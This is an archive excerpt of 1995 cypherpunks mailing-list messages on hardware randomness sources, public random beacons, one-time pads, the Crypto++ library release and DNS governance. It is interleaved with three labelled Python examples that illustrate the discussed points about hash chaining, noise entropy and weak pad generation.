use some digitized transmission that would probably not be worth the
trouble for an attacker to alter, even if one could.  For example,
if we used the entire digital video feed off some major satellite,
it would be enormously expensive to take control of that for any
length of time, to attack some protocol.  To prevent simple attacks,
we can hash the digitized input, and we can make each shared random
packet dependent on previous packets by some relation like

random_packet[i+1] = SHA1(random_packet[i],SHA1(digital_video_packet[i])).

>And so there's no confusion, when I said "like a noisy channel (t.v.
>channel, for example)" I meant a snowy, noisy picture such as one gets with
>rabbit ears on top of the set, especially when the channel is an unused
>one. It is unlikely in the extreme that any attacker could deduce the snowy
>pixel values used in the distillation of entropy.

I was just thinking of the unintended entropy in the stuff going on
on the screen.  Static would mess this idea up, though there are
some ways to recover.

>But back to the subject of "public random bits." Could you elaborate on
>what you mean by this? (I assume you don't mean a one time pad that Alice
>and Bob share, since that is really a separable issue from video as a
>source of randomness. Only one of them will generate the pad, and will then
>securely communicate it to the other.)

No, of course not.  Public random bits can be used in the derivation
of a shared key, to prevent replay attacks in key-exchange
protocols, but you certainly wouldn't want to use the public random
bits directly as key material!

>--Tim May

Note:  Please respond via e-mail as well as or instead of posting,
as I get CP-LITE instead of the whole list.

   --John Kelsey, jmkelsey@delphi.com
 PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCUAwUBMJqtkUHx57Ag8goBAQGWRgP1HES4nQiWRx0P31bi94g5MI8pSEwf5CZu
0RlWLyCl5CLB6PKu7bJDqiyHIBBJ90qqvJvZB740QHVxoRKycOD459nMWjiQXcnA
70Aq8gR+ZYCivsJLJfhKxoxuT+s/VyYVMB7mSfqGIGHHErbXHR4oA2T+Owmm8POi
WDr4w3OjyQ==
=3QHQ
-----END PGP SIGNATURE-----
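The chaining relation in the message above, worked through as an added example (not part of John Kelsey's message). It assumes the comma in SHA1(a,b) means concatenation, a 20-byte starting packet, and a constructed list of byte strings standing in for the video feed; first_divergence, session_key and the HMAC-SHA256 derivation are hypothetical choices made for illustration.

```python
import hashlib
import hmac


def sha1(*parts):
    """SHA-1 over the concatenation of the given byte strings."""
    h = hashlib.sha1()
    for part in parts:
        h.update(part)
    return h.digest()


def next_packet(prev_packet, video_packet):
    # random_packet[i+1] = SHA1(random_packet[i], SHA1(digital_video_packet[i]))
    # Both inputs to the outer hash are 20 bytes, so plain concatenation
    # (an assumption about the notation) is unambiguous.
    return sha1(prev_packet, sha1(video_packet))


def beacon_chain(first_packet, video_packets):
    """Return [random_packet[0], random_packet[1], ...] for a given feed."""
    chain = [first_packet]
    for video_packet in video_packets:
        chain.append(next_packet(chain[-1], video_packet))
    return chain


def first_divergence(chain_a, chain_b):
    """Index of the first packet on which two listeners disagree, or None."""
    for i, (a, b) in enumerate(zip(chain_a, chain_b)):
        if a != b:
            return i
    return None


def session_key(shared_secret, public_packet, label=b"key-exchange-v1"):
    # The public packet is only a freshness input. The key still depends on
    # a secret the two parties already share, so the public bits are never
    # used directly as key material.
    return hmac.new(shared_secret, label + public_packet,
                    hashlib.sha256).digest()


# Constructed sample data: a starting packet and six "video" packets.
FIRST_PACKET = hashlib.sha1(b"constructed starting packet").digest()
FEED = [b"constructed video packet %d" % i for i in range(6)]


def demo():
    alice = beacon_chain(FIRST_PACKET, FEED)
    bob = beacon_chain(FIRST_PACKET, FEED)

    # One listener receives an altered copy of video packet 2.
    altered_feed = list(FEED)
    altered_feed[2] = b"altered packet"
    victim = beacon_chain(FIRST_PACKET, altered_feed)

    secret = b"constructed long-term shared secret"
    return {
        "alice_equals_bob": alice == bob,
        # Packet 3 is the first one computed from video packet 2, and every
        # later packet inherits the difference through the chaining.
        "divergence_index": first_divergence(alice, victim),
        "later_packets_all_differ": all(
            a != v for a, v in zip(alice[3:], victim[3:])),
        # A key bound to packet 4 is useless once the beacon is at packet 5,
        # which is what defeats replay of a recorded exchange.
        "keys_differ_per_packet":
            session_key(secret, alice[4]) != session_key(secret, alice[5]),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

Two listeners who disagree on a single packet disagree on every later one, so comparing any recent packet out of band detects an altered feed.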




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 4 Nov 1995 11:55:54 +0800
To: cypherpunks@toad.com
Subject: Re: consumer products that make nice sources
Message-ID: <acc00caf110210040ee2@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:46 PM 11/3/95, Brad Dolan wrote:

>The tag on my Montana Sunshine Radon Mine radon pillow is a little blurred.
>I think the following is the right phone number.
>
>Sunshine Mine is an amusing concept.  People pay money to go breathe radon
>there, while others are spending much money avoiding radon.
>
>Anyway, the pillows make nice sources and good conversation pieces.

I'd say they make poor sources. Far too large. A smaller source has better
access to the detector without adding much to the overall background the
user is exposed to. (I'm not saying low-level uranium or thorium sources
are much of a hazard, but the fluence presented at the detector is very low
for such an extended source.)

It depends on the detector type (alpha, beta, gamma, neutrino?), but high
count rates can be obtained in a variety of ways. (Don't get too high a
count rate, or the dead time characteristics of the pulse-height analyzers
will introduce spurious correlations that decrease entropy--I mention this
to show that even radiation detector sources of entropy have non-random
issues to take into account.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 4 Nov 1995 10:26:40 +0800
To: Peter Monta <pmonta@qualcomm.com>
Subject: Re: Sources of randomness
In-Reply-To: <199511032324.PAA22269@mage.qualcomm.com>
Message-ID: <199511040044.TAA00751@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Peter Monta writes:
> I'm puzzled by the implication that thermal noise or avalanche or Zener
> noise is somehow inferior to noise from radioactive sources.  It's not.

I didn't contend that it's inferior. I contended that it's difficult to
distinguish from sources of electronic interference and is easy to get
wrong.

> Take as an example Johnson noise, the voltage noise from a
> resistance.  It's the result of the interaction of vast numbers
> of electrons.  It is unpredictable in the same way that individual
> radioactive decay events are unpredictable, and they are both
> results of friendly quantum mechanics.

However, it's very easy to be sure that the event in a radiation
detector was a radioactive decay event. It takes expertise to make
sure that the noise you hear off a noisy circuit isn't just
interference from other parts of the machine feeding back into the
circuit. The reason I like radioactive sources is that they are simple
and unambiguous in this way.

Someone can gimmick a zener diode or get it "wrong" a lot more easily
than they can get a radiation event wrong.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 4 Nov 1995 16:02:30 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Many Topics are Appropriate for Discussion Here
In-Reply-To: <199511040030.TAA28181@opine.cs.umass.edu>
Message-ID: <199511040057.TAA00783@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Futplex writes:
> Perry writes:
> > I don't care about quantity. Steve Bellovin is worth 500 subscribers
> > -- maybe 1000. I'd rather hear his or Phil's off the cuff remarks on a
> > lot of this stuff than most of what passes for careful thought from
> > the average person here.
> 
> I have some not-so-hypothetical questions: 
> 
> Suppose I have serious and plausibly realistic aspirations to become an 
> authority in some subtopic of cryptography, network security, etc. (sometime 
> well into the next millennium). Am I more likely to learn and hone my skills
> by actively participating (sticking my neck out) or merely lurking
> indefinitely ?  Regardless of the answer to the previous question, should
> the list suffer me my missteps and naivete ?
> 
> I do not consider these questions rhetorical, and the answers are very
> important to me on a personal level.

I don't see any problem with a naive person participating. I do see
something wrong with people posting stuff that has nothing whatsoever
to do with the topic of cryptography etc. A discussion of social
security privatization might be interesting, but irrelevant, to name
one example.

Perry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Noah Brodbeck <nbrodbeck@hollandhart.com>
Date: Sat, 4 Nov 1995 10:35:04 +0800
To: cypherpunks@toad.com
Subject: Re: Telephone switch capacity -Reply
Message-ID: <s09a7458.054@allegro.net>
MIME-Version: 1.0
Content-Type: text/plain


>>> John D. Ervin <jervin@netpath.net> 11/03/95 05:32pm
>You would be surprised as to how much is being tapped
>now.
>You need to do a little more research before spouting off..

>>If the FBI wishes to set up a system that is capable
>>of monitoring 1% of the total number of lines, that equates
>>to an ability to tap 5%, not 1% of all calls in progress. 

	I am very confused.  I was not 'spouting off' in any
sense of the word.  Your comment refers to my apparent
lack of knowledge of the widespread practice of
wiretapping.  A practice that, at least according to the sworn
testimony of agents of the FBI, is not very widespread at all.
	That is, however, beside the point.  I was making a
very truthful comment about the engineered capacity of the
telephone network in the U.S.  I made no comment
whatsoever about the current ability or desire of the FBI to
tap into individuals' telephone conversations.

								-=- Noah





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Sat, 4 Nov 1995 15:58:51 +0800
To: hallam@w3.org
Subject: [political noise] Re: Crypto & Taxes
In-Reply-To: <9511031621.AA11770@zorch.w3.org>
Message-ID: <Pine.3.89.9511031916.A12313-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 3 Nov 1995 hallam@w3.org wrote:

> Why unfortunately? I happen to consider that our modern social economy
> is a high point of civilisation. It is certainly a tremendous achievement.
> We can educate the entire population, provide them with health care,
> prevent famine and provide protection against crime and aggression by
> other states. All in all rather a good deal.

That wonderful state of bliss seems rather limited in certain parts of 
the world. 

Not that I want to get into a big political discussion, but David Friedman
has a nice, calm and rational book called The Machinery of Freedom, 2nd ed,
which argues anarchism/libertarianism from an economist's point of view. 
The argument is not cased in terms of ethics and morals but rather 
economic efficiency and utility. Slim, easy to read and cheap. He also 
has a good sense of humor. Unfortunately the book is currently on back order.
I'm holding on to my library copy until they ship one to me.

You can butt heads with him and Tim on the cyberia list (I don't remember 
the address but they have it at news://nntp.hks.net )

I gather from the cyphernomicon that someone recently converted him to 
cryptoanarchy.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Sat, 4 Nov 1995 12:05:01 +0800
To: Peter Monta <pmonta@qualcomm.com>
Subject: Re: Sources of randomness
In-Reply-To: <199511032324.PAA22269@mage.qualcomm.com>
Message-ID: <Pine.3.89.9511032041.C12313-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 3 Nov 1995, Peter Monta wrote:

> I'm puzzled by the implication that thermal noise or avalanche or Zener
> noise is somehow inferior to noise from radioactive sources.  It's not.

How much do the appropriate Zener diodes (it *is* diodes we're talking 
about, right?) cost? Are these things widely available? (sorry I really don't
remember my electronics lessons)

How would you get your first two sources? (the thermal and avalanche)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 4 Nov 1995 11:57:10 +0800
To: s1113645@tesla.cc.uottawa.ca
Subject: Re: [political noise] Re: Crypto & Taxes
In-Reply-To: <Pine.3.89.9511031916.A12313-0100000@tesla.cc.uottawa.ca>
Message-ID: <199511040228.VAA00856@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



As much as I agree with you, this really doesn't belong in
Cypherpunks. This REALLY isn't a list about libertarian politics.

.pm

s1113645@tesla.cc.uottawa.ca writes:
> 
> 
> On Fri, 3 Nov 1995 hallam@w3.org wrote:
> 
> > Why unfortunately? I happen to consider that our modern social economy
> > is a high point of civilisation. It is certainly a tremendous achievement.
> > We can educate the entire population, provide them with health care,
> > prevent famine and provide protection against crime and aggression by
> > other states. All in all rather a good deal.
> 
> That wonderful state of bliss seems rather limited in certain parts of 
> the world. 
> 
> Not that I want to get into a big political discussion, but David Friedman
> has a nice, calm and rational book called The Machinery of Freedom, 2nd ed,
> which argues anarchism/libertarianism from an economist's point of view. 
> The argument is not cased in terms of ethics and morals but rather 
> economic efficiency and utility. Slim, easy to read and cheap. He also 
> has a good sense of humor. Unfortunately the book is currently on back order.
> I'm holding on to my library copy until they ship one to me.
> 
> You can butt heads with him and Tim on the cyberia list (I don't remember 
> the address but they have it at news://nntp.hks.net )
> 
> I gather from the cyphernomicon that someone recently converted him to 
> cryptoanarchy.
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Sat, 4 Nov 1995 09:12:18 +0800
To: cypherpunks@toad.com
Subject: Re: Transcript of Bernstein hearing is now available
In-Reply-To: <9511020308.AA25206@toad.com>
Message-ID: <47e5mc$pec@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


In article <199511021951.LAA03152@mycroft.rand.org>,
Jim Gillogly <jim@acm.org> wrote:
> 	s/([^a-z])nsa([^a-z])/$1NSA$2/g;  # Another one

It'd be faster to use `s/\bnsa\b/NSA/g' for these constructs.
-- 
Shields.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter Monta <pmonta@qualcomm.com>
Date: Sat, 4 Nov 1995 16:29:32 +0800
To: cypherpunks@toad.com
Subject: Re: Sources of randomness
Message-ID: <199511040804.AAA03552@mage.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry Metzger writes:

> > [ radioactive vs. other ]
>
> I didn't contend that it's inferior. I contended that it's difficult to
> distinguish from sources of electronic interference and is easy to get
> wrong.

Point taken; it sounds like I misread your post a bit.  Certainly
it's better to have a robust implementation than a delicate one,
but let me argue how hard it might be to get electronic sources
wrong.

> ...
> Someone can gimmick a zener diode or get it "wrong" a lot more easily
> than they can get a radiation event wrong.

But how wrong is wrong?  Unless the design is catastrophically bad,
a zener source is going to give you zener noise plus some slight
admixture of interference.  Say the designer is extremely careless
and there's deterministic interference 20 dB down.  I don't see
how even that matters cryptographically---the resulting loss in
entropy will be millibits per sample.

Perhaps there ought to be a couple of standard random-bit-source
implementations, say at the CMOS-standard-cell and board-subsystem
levels, that are widely vetted and trusted (and used!).  But it's
mostly a solved problem, seems to me.

A radioactive source might be okay at the board level (though probably
costlier than its electronic counterpart), but it'd be a pain to
integrate, and it might disturb the rest of the chip.  (I'd like to
have a get_random_bit instruction as part of a microprocessor, for
example.)  Also if you want a high rate of random bits, you need many
decay events, whereas for electronic sources the corresponding
bandwidth is free---Johnson and shot noise are flat to 1 THz or so.

Interestingly enough, zener diodes and particle detectors are a lot
alike.  Zeners, if they're avalanching, already have some internal
gain; each electron crossing the junction gets so hot it knocks
off other electrons, and there's a chain reaction.  Particle detectors
take the ion trail in a suitable environment and make a nice
big pulse out of it with a similar chain-reaction effect (though
the fancier kind will give you the actual amount of charge).

Cheers,
Peter Monta   pmonta@qualcomm.com
Qualcomm, Inc./Globalstar
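A numerical check of the "millibits per sample" estimate in the message above, as an added example that is not part of Peter Monta's post. The model is an assumption: one bit per sample from a comparator at zero, unit-variance Gaussian noise, independent samples, and a sinusoidal interferer whose amplitude and phase the observer knows exactly; all function names are hypothetical.

```python
import math


def phi(x):
    """Standard normal cumulative distribution function."""
    return 0.5 * (1.0 + math.erf(x / math.sqrt(2.0)))


def h2(p):
    """Binary entropy in bits."""
    if p <= 0.0 or p >= 1.0:
        return 0.0
    return -(p * math.log2(p) + (1.0 - p) * math.log2(1.0 - p))


def interference_amplitude(db_down):
    # A sinusoid of peak amplitude a has power a^2 / 2. The noise power is 1,
    # so "db_down" dB below the noise means a^2 / 2 = 10^(-db_down / 10).
    return math.sqrt(2.0) * 10.0 ** (-db_down / 20.0)


def entropy_per_sample(db_down, steps=20000):
    """Entropy of one comparator bit, given the interference is known.

    At interferer phase theta the comparator sees noise + a*sin(theta), so
    P(bit = 1) = phi(a*sin(theta)). An observer who knows the phase is left
    with h2 of that probability; average it over one full cycle.
    """
    a = interference_amplitude(db_down)
    total = 0.0
    for k in range(steps):
        theta = 2.0 * math.pi * (k + 0.5) / steps
        total += h2(phi(a * math.sin(theta)))
    return total / steps


def loss_millibits(db_down):
    """Entropy lost per sample, in thousandths of a bit."""
    return (1.0 - entropy_per_sample(db_down)) * 1000.0


def table(levels=(40, 30, 20, 10, 0)):
    """(dB below noise, millibits lost per sample) for several levels."""
    return [(db, round(loss_millibits(db), 3)) for db in levels]


if __name__ == "__main__":
    for db, loss in table():
        print("interference %2d dB down: %9.3f millibits lost per sample"
              % (db, loss))
```

Under these assumptions the 20 dB case costs between 4 and 5 millibits per sample, and the loss falls by roughly a factor of ten for every further 10 dB of isolation.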




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Curtis <jbell@capecod.net>
Date: Sat, 4 Nov 1995 15:02:02 +0800
To: "'Cypherpunks Mailing List'" <cypherpunks@toad.com>
Subject: RE: Many Topics are Appropriate for Discussion Here
Message-ID: <01BAAA51.0BAA6820@hy34.capecod.net>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3935.1071713515.multipart/mixed"

--Boundary..3935.1071713515.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

Nothing ventured, nothing gained.  I don't mind reading serious
questions no matter how naive, provided that the questioner is
willing to listen to the responses no matter how acerbic.
You would have to have a pretty thick skin to post here frequently.
----------
From: 	Futplex[SMTP:futplex@pseudonym.com]
Sent: 	Friday, November 03, 1995 2:30 PM
To: 	Cypherpunks Mailing List
Subject: 	Re: Many Topics are Appropriate for Discussion Here

I have some not-so-hypothetical questions: 

Suppose I have serious and plausibly realistic aspirations to become an 
authority in some subtopic of cryptography, network security, etc. (sometime 
well into the next millennium). Am I more likely to learn and hone my skills
by actively participating (sticking my neck out) or merely lurking
indefinitely ?  Regardless of the answer to the previous question, should
the list suffer me my missteps and naivete ?

I do not consider these questions rhetorical, and the answers are very
important to me on a personal level.

And now I believe I'll shut up for a while.

-Futplex <futplex@pseudonym.com>



--Boundary..3935.1071713515.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Sat, 4 Nov 1995 19:10:26 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Crypto++ 1.1
Message-ID: <Pine.SUN.3.91.951104024506.12530A-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


I am still talking to RSADSI's lawyers, but it's taking a lot longer 
than I expected.  So in the mean time I've decided to rerelease the 
Crypto++ library with RC4, RC5, RSA removed, and some calls to RSAREF 
disabled.  RSADSI said it will not object to this rerelease.  Version 1.1 
also has some minor bug fixes.  You can find it at
 
ftp://ftp.csn.net/mpj/I_will_not_export/crypto_?????/libraries/crypto11.zip
 
where ????? is in ftp://ftp.csn.net/mpj/README
 
For the next version I hope to work out a deal with RSADSI to put 
some of those files back in.  I'm also planning to add SAFER and 
perhaps some elliptic curve stuff.  Other suggestions 
are welcome.
 
I encourage people to use this library in commercial as well as 
shareware/freeware products.  You don't have to pay me a cent, but 
don't forget about the patents.
 
Wei Dai
                                    
P.S. Does anyone know if elliptic curve key agreement protocols are 
patented?  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Sun, 5 Nov 1995 07:36:08 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: alt.anonymous.messages considered harmful
Message-ID: <acc0fd1a0102100488c4@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


I will feed alt.anonymous.messages to ANYONE who asks. I will accept a feed
of that one group from any news server which is used by a remailer.

        -Lance

At 1:13 PM 11/2/95, Futplex wrote:
>Name Withheld by Request writes:
>[re: problems with the Usenet newsgroup model of pseud/anonymous message pools]
>> Denial of service attacks could be made somewhat less feasible by
>> making the pool accessible as a mailing list and via http.
>
>Mailing lists of course suffer the problem of strictly limited participation.
>The web approach might work better, in some future with better privacy-
>protecting infrastructure in place. Specifically, if HTTP transactions with
>a popular web server were routinely encrypted, then all reasonably long
>visits to that site would act as cover traffic for a message pool on that
>server. As a bonus, you could have a spiffy form on the web page that
>searches the pool for you.
>
>In any event, the server could log your exploration. This returns us to the
>issue of strongly anonymous web proxies. (And we could imagine
>countermeasures, like daemons that search for randomly selected pseudonym tags
>to muddy the waters. As Tim might say, lots of issues.)
>
>Also, the mention of "as a mailing list _and_ via http" is significant. Making
>the pool available in multiple forms seems to be an unconditional benefit.
>
>-Futplex <futplex@pseudonym.com>

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@omni.voicenet.com>
Date: Sun, 5 Nov 1995 04:41:32 +0800
To: cypherpunks@toad.com
Subject: Re: using pgp to make an otp
In-Reply-To: <01HX8P5B3MCI91XT4Q@MAIL-CLUSTER.PCY.MCI.NET>
Message-ID: <Pine.LNX.3.91.951104032833.116A-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 5 Nov 1995, amp wrote:
 
> greetings c-punks,
> 
> i may have posted this at some time in the past, as i have asked it
> elsewhere and gotten different responses. i'm interested in what the
> folx here think about it though, so here it is...
> 
> i want a source of data for use as a otp. i don't want to have to
> hook up any external devices to my pc to do it. (although some of the
> methods mentioned in the past few days are quite interesting.)
> 
> i'd like to know if there was a reason not to use the output of pgp
> to do it. i've been playing with the following method. i take a file
> and encrypt it to a key with the '-a' flag on. this generates an
> ascii file that is easily editable using simple, standard rexx calls.
> i strip the first 20 or so lines and the last 20 or so lines
> and put the resulting file aside. then i perform the same operation
> again and append the file to the previous result. i repeat until the
> file is sufficiently large for my purposes and then give the
> resulting file to the person(s) i want to have it.

There is a way to make a file with random contents using PGP.  Just type
pgp +makerandom=xxx file.ext where xxx is the size of the file you want to
create.  I would not advise using this or other methods using a pseudo-
random number generator.
 
> i would think that the output of pgp should be pretty darn random. if
> it isn't, then its usefulness is less than its reputation imo. as
> you can tell if you've read this far, i'm not a cryptographer. i just
> like the stuff and am working to become more proficient in its use as
> i think it is important if we are to maintain our privacy in an
> increasingly digital world.

The random output of PGP is pretty random but when the output is used to
generate very large OTP's, patterns will no doubt exist.  Hardware RNG's
are still the best. 

`finger -l markm@omni.voicenet.com` for public key and Geek Code
Public Key/1024: 0xF9B22BA5 BD 24 D0 8E 3C BB 53 47  20 54 FA 56 00 22 58 D5
Homepage URL:http://www.voicenet.com/~markm/
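Why pad material stretched from a generator does not give one-time-pad security, as an added example that is not from any message in this thread: the pad can carry no more entropy than the generator's seed. The generator here is a constructed toy (SHA-256 in counter mode over a deliberately tiny 16-bit seed), not PGP's; the message, seed and function names are all constructed for illustration.

```python
import hashlib

SEED_BITS = 16  # deliberately tiny so the search below finishes instantly


def stretch(seed, nbytes):
    """Toy generator: SHA-256 in counter mode, keyed only by `seed`."""
    out = bytearray()
    counter = 0
    while len(out) < nbytes:
        block = seed.to_bytes(4, "big") + counter.to_bytes(8, "big")
        out += hashlib.sha256(block).digest()
        counter += 1
    return bytes(out[:nbytes])


def ones_fraction(data):
    """Fraction of 1 bits; close to 0.5 for statistically random data."""
    return sum(bin(byte).count("1") for byte in data) / (8.0 * len(data))


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def recover_seed(ciphertext, known_prefix):
    """Find the seed whose output explains a known start of the message.

    With a true one-time pad every pad value is equally likely, so a known
    prefix says nothing about the rest. With a stretched seed, only
    2**SEED_BITS pads exist and each can simply be tried.
    """
    target = xor(ciphertext[:len(known_prefix)], known_prefix)
    for seed in range(1 << SEED_BITS):
        if stretch(seed, len(target)) == target:
            return seed
    return None


# Constructed sample message and seed.
MESSAGE = b"Subject: meeting moved to Thursday, bring the signed license."
SECRET_SEED = 0xBEEF


def demo():
    pad = stretch(SECRET_SEED, len(MESSAGE))
    ciphertext = xor(MESSAGE, pad)
    # The pad looks fine to a simple frequency test...
    looks_random = ones_fraction(stretch(SECRET_SEED, 100000))
    # ...yet nine known bytes of plaintext pin down the whole pad.
    found = recover_seed(ciphertext, b"Subject: ")
    recovered = xor(ciphertext, stretch(found, len(ciphertext)))
    return found, recovered, looks_random


if __name__ == "__main__":
    found, recovered, looks_random = demo()
    print("fraction of 1 bits in pad: %.4f" % looks_random)
    print("seed recovered: 0x%04X" % found)
    print("plaintext recovered:", recovered.decode())
```

A larger seed only raises the cost of the search; the resulting system is then a stream cipher with that key size, not a one-time pad.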




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Campbell <edge@got.net>
Date: Sun, 5 Nov 1995 19:10:40 +0800
To: cypherpunks@toad.com
Subject: Re: Re[2]: FBI seeks huge wiretapping system
Message-ID: <199511041320.FAA12812@you.got.net>
MIME-Version: 1.0
Content-Type: text/plain


>It is a well-known fact that it was common practice for NSA operatives to
>                                                        ^^^
>masquerade as Injuns in the 1800's and waylay Pony Express riders in order 
>                            ^^^^^^
>I think you'll find the NSA was not in existence in the 1800's.

I'm disappointed at the sheer number of similar pieces of email I received
on this. You'da thought the Capn Crunch reference was silly enough that
people would give me a funny look and trash the original message.
--
   Jay Campbell                edge@got.net - Operations Manager
   -=-=-=-=-=-=-               Sense Networking, Santa Cruz Node
   Jay@Campbell.net            got.net? PGP MIT KeyID 0xACAE1A89           
 
"On the Information Superhighway, I'm the guy 
  behind you in this morning's traffic jam leaning on his horn."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Sat, 4 Nov 1995 14:23:49 +0800
To: cypherpunks@toad.com
Subject: Re: censored? corrected [Steve Pizzo cited in The Spotlight]
In-Reply-To: <199511022000.OAA09507@galil.austnsc.tandem.com.>
Message-ID: <47eti3$18q@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


(Hopefully someone will correct me if any of this is wrong.  But it
would be nice if the thread ends.)

Here's how it works, politically.  IANA is the ultimate custodian of
the namespace.  IANA has delegated administrative control of the six
traditional top-level domains (TLDs) to the InterNIC.

The InterNIC is a building in my zipcode.  It's in a mundane industrial
park they share with PSI.  It is operated by NSI, which is owned by SAIC,
and funded by an NSF grant and the new domain charges.

Here's how it works, technically.  Your nameserver, if it doesn't
know how to jump into the middle of the tree (via cached data, or the
preconfigured servers for the local domain and the root), will start at
the top of the tree and walk down.

The root nameservers are run by volunteers.  There are nine.  One is
at the InterNIC, but it need not be.  The others are at ISI, PSI, UMD,
NASA, UUNET (ISC), DDN, the Army Research Lab, and NORDUnet (in Sweden).

(The most central point is actually Paul Vixie, maintainer of BIND,
the software used for almost all nameservers, including the roots.
UUNET funds BIND development.)

If the InterNIC yanked your domain, this would *not* affect your IP
connectivity -- your ability to be reached by any Internet protocol via
IP address.  The InterNIC has nothing at all to do with that.

I'm much more worried about a lack of competency at NSI than I am about
the FBI asking them to pull the plug on troublemakers, especially since
it would be taken very seriously if you had a legitimate complaint
about unjust termination (and some people, upset at having to pay for
their domain(s), are looking for any reason to tear into the InterNIC's
reputation).

And *especially* since the evil government types could just call up
Bell Atlantic, who they are already friendly with, and have them make
my line unusable.  That's what I'd do, were I an evil government type.

And if anyone wanted to subvert your domain at a small fraction of the
sites, DNS is easily spoofable....

So keep a sense of perspective.
-- 
Shields.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 4 Nov 1995 21:37:51 +0800
To: cypherpunks@toad.com
Subject: 800_ape
Message-ID: <199511041323.IAA16916@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   11-5-95. NYPaper Sunday Magazine:

   "Making Microsoft Safe For Capitalism. How do you restrain
   an 800-pound gorilla?" Cover story. By James Gleick.

      If the software giant has its way, it will soon be in a
      position to collect a charge for every airline ticket
      you buy, every credit card purchase you make, every fax
      you send, every picture you download, every Web site you
      visit. It's time to draw the line. But where?

      'Anything not a direct lie or clearly illegal is O.K. to
      do if it advances Microsoft's tribal cause,' Mitchell
      Kapor says. 'This licenses the worst sort of
      manipulations, lies, tortured self-justification and so
      on.'


   800_ape  (Long)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 6 Nov 1995 00:46:26 +0800
To: cypherpunks@toad.com
Subject: Re: e$: 24 Hours
Message-ID: <v02120d00acc10c318f69@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>e$: 24 Hours

I have no idea how this got sent out twice.

However it happened, I apologize.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cmckie@ccs.carleton.ca (Craig McKie)
Date: Sat, 4 Nov 1995 22:25:35 +0800
To: cypherpunks@toad.com
Subject: ICE Summary
Message-ID: <9511041401.AA04992@superior>
MIME-Version: 1.0
Content-Type: text/plain


Summary of the 2nd International Cryptography Experiment (ICE)
Workshop, Shape Technical Centre, The Hague, Sept.18-19, 1995

http://www.tis.com/crypto/ice/summary.html









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
